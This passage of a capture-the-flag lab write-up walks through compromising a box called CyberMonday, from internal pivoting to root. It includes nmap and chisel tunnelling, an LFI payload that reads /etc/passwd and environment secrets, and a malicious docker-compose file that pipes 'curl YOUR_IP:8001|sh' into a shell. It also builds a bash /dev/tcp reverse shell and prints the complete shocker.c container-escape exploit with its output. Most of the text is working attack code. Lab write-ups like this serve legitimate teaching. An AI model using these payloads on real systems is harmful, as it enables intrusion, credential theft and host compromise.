network. For this, we can upload a static nmap binary to the machine to enumerate the internal hosts.

We download the nmap binary to our local machine.

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap

Then, we serve it using a Python HTTP server.

python3 -m http.server 8001

We fetch it on the remote host and make the file executable.

curl YOUR_IP:8001/nmap -o /tmp/nmap


chmod +x /tmp/nmap

Finally, we scan the subnet using the -sn option.

/tmp/nmap -sn 172.18.0.0/24 --min-rate 1000

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-11-26 18:49 UTC


Cannot find nmap-payloads. UDP payloads are disabled.

Nmap scan report for 172.18.0.1


Host is up (0.0021s latency).
Nmap scan report for cybermonday_registry_1.cybermonday_default (172.18.0.2)
Host is up (0.0019s latency).
Nmap scan report for cybermonday_nginx_1.cybermonday_default (172.18.0.3)
Host is up (0.0016s latency).
Nmap scan report for cybermonday_redis_1.cybermonday_default (172.18.0.4)
Host is up (0.0013s latency).
Nmap scan report for cybermonday_db_1.cybermonday_default (172.18.0.5)
Host is up (0.0010s latency).
Nmap scan report for cybermonday_api_1.cybermonday_default (172.18.0.6)
Host is up (0.00074s latency).

Nmap scan report for 070370e2cdc4 (172.18.0.7)


Host is up (0.00038s latency).
Nmap done: 256 IP addresses (7 hosts up) scanned in 14.12 seconds

The scan shows that 7 hosts are up, including cybermonday_api on 172.18.0.6 , to which we were
making requests previously. We see that a Docker registry is also running on 172.18.0.2 .

A Docker registry is a centralized repository that stores and manages Docker images. It serves as a
distribution centre for Docker images, allowing users to share, distribute, and access containerized
applications. By default, a Docker registry listens on port 5000 .

With access to the Docker registry, we can try to list the available Docker images.

curl 172.18.0.2:5000/v2/_catalog

{"repositories":["cybermonday_api"]}

curl 172.18.0.2:5000/v2/cybermonday_api/tags/list

{"name":"cybermonday_api","tags":["latest"]}

The response indicates that there's an image "cybermonday_api" that has a single tag "latest".

We can try to port forward the registry to our local machine and download the image
cybermonday_api:latest for further analysis. This can be accomplished using the chisel utility.

We download and serve the chisel binary using a Python HTTP server on our local machine.

wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gzip -d chisel_1.9.1_linux_amd64.gz
mv chisel_1.9.1_linux_amd64 chisel
python3 -m http.server 8001

Then, we fetch it on the remote host and give the binary execution permissions.

curl YOUR_IP:8001/chisel -o /tmp/chisel


chmod +x /tmp/chisel

We start a local chisel server on the local machine on port 8000 .

./chisel server --reverse --port 8000


We run the following command on the remote server to connect to the chisel server on our local machine.
The R:5000:172.18.0.2:5000 argument specifies that the client should create a reverse tunnel, forwarding
incoming connections on localhost:5000 to the remote Docker registry at 172.18.0.2:5000 .

www-data@070370e2cdc4:/tmp$ /tmp/chisel client 10.10.14.110:8000 R:5000:172.18.0.2:5000

Now let's download the cybermonday_api docker image on our machine.

sudo docker pull localhost:5000/cybermonday_api:latest

latest: Pulling from cybermonday_api


5b5fe70539cd: Pull complete
affe9439d2a2: Pull complete
1684de57270e: Pull complete
dc968f4da64f: Pull complete
57fbc4474c06: Pull complete
9f5fbfd5edfc: Pull complete
5c3b6a1cbf54: Pull complete
4756652e14e0: Pull complete
57cdb531a15a: Pull complete
1696d1b2f2c3: Pull complete
ca62759c06e1: Pull complete
ced3ae14b696: Pull complete
beefd953abbc: Pull complete
Digest: sha256:72cf91d5233fc1bedc60ce510cd8166ce0b17bd1e9870bbc266bf31aca92ee5d
Status: Downloaded newer image for localhost:5000/cybermonday_api:latest
localhost:5000/cybermonday_api:latest

After downloading the Docker image, we can initiate its execution in interactive mode.

sudo docker run -it localhost:5000/cybermonday_api:latest bash

Let's review the source code of the Cybermonday API to discover any potentially vulnerable functionality.

As soon as we inspect the config.php file, we see that it obtains MySQL authentication credentials from
the environment variables.

Analyzing the file app/routes/Router.php , we see the routes defined in the API.
Previously, we had not seen the /webhooks/:uuid/logs route. Upon examination, it is found to invoke the
index method of the LogsController controller, prompting further analysis.

Within the controller code for "LogsController", it becomes apparent that the apiKeyAuth() method is
invoked to secure the route.

We manage to obtain the API key by analyzing the apiKeyAuth() method in the /app/helpers/Api.php
file. We see that this method checks whether the x-api-key HTTP header is present and, if so, whether
its value is equal to the api_key variable.
Going back to the "LogsController" controller code, we see that the "action" of the webhook needs to be
"createLogFile" in order to be able to access the route /webhooks/:uuid/logs .

Analyzing the actions of this route, we see that the "list" action only lists the created logs, and the "read"
action reads those logs.

Here's the method to perform the "read" operation.


We see that the "read" action is vulnerable to LFI. This happens because str_replace is removing spaces
from the string in an insecure way. The correct thing would be to use the trim function, which removes
only the beginning and end of the string. Right after that, we have another condition that checks if the word
"log" is included in the string, but we can easily bypass this by specifying default Linux directories such as
/var/log .

We can try to read the /etc/passwd file using the following payload (note the spaces).

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /etc/passwd"
}
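
To see why the spaces matter, this is roughly the transformation the controller ends up applying; a Python illustration of the logic described above (the real code is PHP):

payload = ".. /.. /var/log/.. /.. /etc/passwd"

# The controller requires the word "log" somewhere in the name (satisfied by /var/log) ...
assert "log" in payload

# ... and then strips spaces from anywhere in the string instead of trimming the ends,
# turning the ".. /" fragments into real "../" traversal sequences.
print(payload.replace(" ", ""))   # -> ../../var/log/../../etc/passwd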

The first step is to create a new webhook with the action "createLogFile":

The second step is to define the headers to access the route, which includes x-api-key .

The third step is to access the route and send the payload to the endpoint /<uuid>/logs .

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /etc/passwd"
}
The API response includes the contents of the /etc/passwd file, confirming the presence of a Local File
Inclusion (LFI) vulnerability.

Through Local File Inclusion (LFI), we can attempt to read /proc/self/environ , which stores the
environment variables.

{
"action": "read",
"log_name": ".. /.. /var/log/.. /.. /proc/self/environ"
}
The environment variables contain a variable DBPASS , which reveals the database password.

ngFfX2L71Nu

We can use this password to SSH into the remote host as the previously discovered user john .

ssh john@cybermonday.htb

john@cybermonday.htb's password: ngFfX2L71Nu

john@cybermonday:~$ id
uid=1000(john) gid=1000(john) groups=1000(john)

The user flag can be obtained at /home/john/user.txt .

cat /home/john/user.txt

Privilege Escalation
Enumerating the user's sudo privileges, we see that john has permission to run the
/opt/secure_compose.py script with any .yml as an argument, with sudo privileges.
john@cybermonday:~$ sudo -l

[sudo] password for john:

Matching Defaults entries for john on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on localhost:
    (root) /opt/secure_compose.py *.yml

Let's inspect the Python script located at /opt/secure_compose.py to comprehend its functionality.

#!/usr/bin/python3
import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
    return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
    whitelist = [f"/home/{get_user()}", "/mnt"]
    for allowed_path in whitelist:
        if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
            return True
    return False

def check_whitelist(volumes):
    for volume in volumes:
        parts = volume.split(":")
        if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
            return False
    return True

def check_read_only(volumes):
    for volume in volumes:
        if not volume.endswith(":ro"):
            return False
    return True

def check_no_symlinks(volumes):
    for volume in volumes:
        parts = volume.split(":")
        path = parts[0]
        if os.path.islink(path):
            return False
    return True

def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

def main(filename):
    if not os.path.exists(filename):
        print(f"File not found")
        return False

    with open(filename, "r") as file:
        try:
            data = yaml.safe_load(file)
        except yaml.YAMLError as e:
            print(f"Error: {e}")
            return False

    if "services" not in data:
        print("Invalid docker-compose.yml")
        return False

    services = data["services"]

    if not check_no_privileged(services):
        print("Privileged mode is not allowed.")
        return False

    for service, config in services.items():
        if "volumes" in config:
            volumes = config["volumes"]
            if not check_whitelist(volumes) or not check_read_only(volumes):
                print(f"Service '{service}' is malicious.")
                return False
            if not check_no_symlinks(volumes):
                print(f"Service '{service}' contains a symbolic link in the volume, which is not allowed.")
                return False
    return True

def create_random_temp_dir():
    letters_digits = string.ascii_letters + string.digits
    random_str = ''.join(random.choice(letters_digits) for i in range(6))
    temp_dir = f"/tmp/tmp-{random_str}"
    return temp_dir

def copy_docker_compose_to_temp_dir(filename, temp_dir):
    os.makedirs(temp_dir, exist_ok=True)
    shutil.copy(filename, os.path.join(temp_dir, "docker-compose.yml"))

def cleanup(temp_dir):
    subprocess.run(["/usr/bin/docker-compose", "down", "--volumes"],
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    shutil.rmtree(temp_dir)

def signal_handler(sig, frame):
    print("\nSIGINT received. Cleaning up...")
    cleanup(temp_dir)
    sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Use: {sys.argv[0]} <docker-compose.yml>")
        sys.exit(1)

    filename = sys.argv[1]
    if main(filename):
        temp_dir = create_random_temp_dir()
        copy_docker_compose_to_temp_dir(filename, temp_dir)
        os.chdir(temp_dir)

        signal.signal(signal.SIGINT, signal_handler)

        print("Starting services...")
        result = subprocess.run(["/usr/bin/docker-compose", "up", "--build"],
                                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        print("Finishing services")

        cleanup(temp_dir)

This Python script is a security tool designed to validate and secure Docker Compose files. It checks various
security aspects, including whether privileged mode is disallowed, if volumes are restricted to a whitelist,
and if read-only and symbolic link constraints are enforced. The script creates a temporary directory, copies
the provided Compose file into it, and then uses docker-compose to start the services in the specified file. It
includes cleanup mechanisms to handle interruptions or the completion of service execution.

Notably, the script restricts the use of privileged mode for Docker containers. As an alternative approach,
we can employ the cap_add: all directive to confer all capabilities to our Docker container.
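
A quick way to see why this slips past the validator (reusing the capability check from the script above, copied verbatim, with an example services definition):

# check_no_privileged() as defined in /opt/secure_compose.py
def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

services = {"pwn": {"image": "cybermonday_api", "cap_add": ["ALL"]}}
print(check_no_privileged(services))   # True -> a fully-capable container is accepted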

This blog post demonstrates that granting CAP_DAC_READ_SEARCH to our container not only
enables unrestricted traversal of the file system but also satisfies the capability check for
open_by_handle_at(2) , potentially granting our process access to sensitive files on the host. The blog also
references the shocker.c script, which leverages the CAP_DAC_READ_SEARCH capability of the container,
allowing us to read any arbitrary file on the host system.

We are aware of the presence of a Docker image named cybermonday_api in the Docker registry of the
remote host. Consequently, let's instantiate a container using the cybermonday_api image. Additionally, we
will utilize the command directive to execute a reverse shell payload from within the container. We will
employ the below docker-compose file and save it as /tmp/pwn.yml on the remote host.

version: '3'
services:
  pwn:
    image: cybermonday_api
    cap_add:
      - ALL
    command: sh -c "curl YOUR_IP:8001|sh"

We store the following bash reverse shell payload and save it as an index.html file on our local machine.

echo "/bin/bash -c \"bash -i >& /dev/tcp/YOUR_IP/1337 0>&1\"" > index.html

We start a Python web server in the same directory as the index.html file.

python3 -m http.server 8001

Start a Netcat listener on port 1337 .

nc -nvlp 1337

Now, run the /opt/secure_compose.py script with /tmp/pwn.yml as an argument.

john@cybermonday:/tmp$ sudo /opt/secure_compose.py /tmp/pwn.yml

Starting services...

We receive a reverse shell as user root from within the container.

root@d78f5421d496:/var/www/html# id

uid=0(root) gid=0(root) groups=0(root)

root@d78f5421d496:/var/www/html# hostname
d78f5421d496

The shocker.c script is available here. We have modified the script to take two arguments: the first is the
path of the arbitrary file to read on the host system, and the second is the path of the file in the container to
which the contents of the read file will be written.

Moreover, the portion of the script aiming to obtain a file system reference by opening a particular file has
been modified to utilize the file /etc/hostname .

// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
    die("[-] open");

Here is the modified shocker.c script that we will utilize to access any arbitrary file on the host system.
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>

struct my_file_handle {
    unsigned int handle_bytes;
    int handle_type;
    unsigned char f_handle[8];
};

void die(const char *msg)
{
    perror(msg);
    exit(errno);
}

void dump_handle(const struct my_file_handle *h)
{
    fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h->handle_bytes, h->handle_type);
    for (int i = 0; i < h->handle_bytes; ++i) {
        fprintf(stderr, "0x%02x", h->f_handle[i]);
        if ((i + 1) % 20 == 0)
            fprintf(stderr, "\n");
        if (i < h->handle_bytes - 1)
            fprintf(stderr, ", ");
    }
    fprintf(stderr, "};\n");
}

int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
    int fd;
    uint32_t ino = 0;
    struct my_file_handle outh = {
        .handle_bytes = 8,
        .handle_type = 1
    };
    DIR *dir = NULL;
    struct dirent *de = NULL;
    path = strchr(path, '/');
    // recursion stops if path has been resolved
    if (!path) {
        memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
        oh->handle_type = 1;
        oh->handle_bytes = 8;
        return 1;
    }

    ++path;
    fprintf(stderr, "[*] Resolving '%s'\n", path);
    if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
        die("[-] open_by_handle_at");
    if ((dir = fdopendir(fd)) == NULL)
        die("[-] fdopendir");
    for (;;) {
        de = readdir(dir);
        if (!de)
            break;
        fprintf(stderr, "[*] Found %s\n", de->d_name);
        if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
            fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
            ino = de->d_ino;
            break;
        }
    }

    fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
    if (de) {
        for (uint32_t i = 0; i < 0xffffffff; ++i) {
            outh.handle_bytes = 8;
            outh.handle_type = 1;
            memcpy(outh.f_handle, &ino, sizeof(ino));
            memcpy(outh.f_handle + 4, &i, sizeof(i));
            if ((i % (1 << 20)) == 0)
                fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
            if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
                closedir(dir);
                close(fd);
                dump_handle(&outh);
                return find_handle(bfd, path, &outh, oh);
            }
        }
    }
    closedir(dir);
    close(fd);
    return 0;
}

int main(int argc, char *argv[])
{
    char buf[0x1000];
    int fd1, fd2;
    struct my_file_handle h;
    struct my_file_handle root_h = {
        .handle_bytes = 8,
        .handle_type = 1,
        .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
    };

    fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
                    "[***] The tea from the 90's kicks your sekurity again. [***]\n"
                    "[***] If you have pending sec consulting, I'll happily [***]\n"
                    "[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");

    read(0, buf, 1);

    // get a FS reference from something mounted in from outside
    if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
        die("[-] open");

    if (find_handle(fd1, argv[1], &root_h, &h) <= 0)
        die("[-] Cannot find valid handle!");

    fprintf(stderr, "[!] Got a final handle!\n");
    dump_handle(&h);

    if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
        die("[-] open_by_handle");

    memset(buf, 0, sizeof(buf));
    if (read(fd2, buf, sizeof(buf) - 1) < 0)
        die("[-] read");

    printf("Success!!\n");

    FILE *fptr;
    fptr = fopen(argv[2], "w");
    fprintf(fptr, "%s", buf);
    fclose(fptr);

    close(fd2);
    close(fd1);

    return 0;
}

Let us serve the shocker.c script and fetch it on the remote host.

root@12642a251489:/tmp# curl YOUR_IP:8001/shocker.c -o /tmp/shocker.c

Compile the C script in the Docker container using the gcc utility and save the binary as /tmp/shocker .

root@12642a251489:/tmp# gcc -Wall -std=c99 -O2 /tmp/shocker.c -static -o /tmp/shocker

shocker.c: In function 'find_handle':


shocker.c:60:15: warning: implicit declaration of function 'open_by_handle_at' [-
Wimplicit-function-declaration]
60 | if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
| ^~~~~~~~~~~~~~~~~
shocker.c:62:16: warning: implicit declaration of function 'fdopendir'; did you mean
'opendir'? [-Wimplicit-function-declaration]
62 | if ((dir = fdopendir(fd)) == NULL)
| ^~~~~~~~~
| opendir
shocker.c:62:14: warning: assignment to 'DIR *' from 'int' makes pointer from integer
without a cast [-Wint-conversion]
62 | if ((dir = fdopendir(fd)) == NULL)

We can execute the shocker binary with the following arguments:

./shocker <file/to/read/on/host/system> /tmp/output.txt

Let's try to read the root flag /root/root.txt .

root@12642a251489:/tmp# ./shocker /root/root.txt output.txt

[***] docker VMM-container breakout Po(C) 2014 [***]


[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'root/root.txt'

[*] Found lib


[*] Found boot
[*] Found libx32
[*] Found bin
[*] Found vmlinuz.old
[*] Found initrd.img
[*] Found ..
[*] Found root
[+] Match: root ino=20
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .
[*] Found .profile
[*] Found .local
[*] Found root.txt
[+] Match: root.txt ino=38
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
Success!!

We can see that the root flag has been successfully saved to the file /tmp/output.txt .

root@12642a251489:/tmp# cat output.txt
